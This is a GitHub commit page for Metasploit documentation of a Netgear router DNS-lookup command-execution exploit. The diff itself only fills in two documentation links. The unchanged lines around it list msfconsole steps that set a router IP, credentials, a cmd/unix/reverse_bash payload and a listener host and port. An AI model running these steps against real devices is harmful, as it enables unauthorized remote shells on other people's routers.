Skip to content

Commit 7556768

Browse files
authored
Update netgear_dnslookup_cmd_exec.md
1 parent 4a974d5 commit 7556768

File tree

1 file changed

+2
-2
lines changed

1 file changed

+2
-2
lines changed

documentation/modules/exploit/linux/http/netgear_dnslookup_cmd_exec.md

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -7,8 +7,8 @@
77
1. start `msfconsole`
88
2. `use exploit/linux/http/netger_dnslookup_cmd_exec`
99
3. `set RHOST 192.168.1.1` `<--- Router IP`
10-
4. `set USERNAME xxxx` (see [here]())
11-
5. `set PASSWORD xxxx` (see [here]())
10+
4. `set USERNAME xxxx` (see [here](https://github.com/thecarterb/metasploit-framework/blob/ng_dns_cmd_exec-dev/documentation/modules/exploit/linux/http/netgear_dnslookup_cmd_exec.md#options))
11+
5. `set PASSWORD xxxx` (see [here](https://github.com/thecarterb/metasploit-framework/blob/ng_dns_cmd_exec-dev/documentation/modules/exploit/linux/http/netgear_dnslookup_cmd_exec.md#options))
1212
5. `set PAYLOAD cmd/unix/reverse_bash`
1313
6. `set LHOST 192.168.1.x`
1414
7. `set LPORT xxxx`

0 commit comments

Comments
 (0)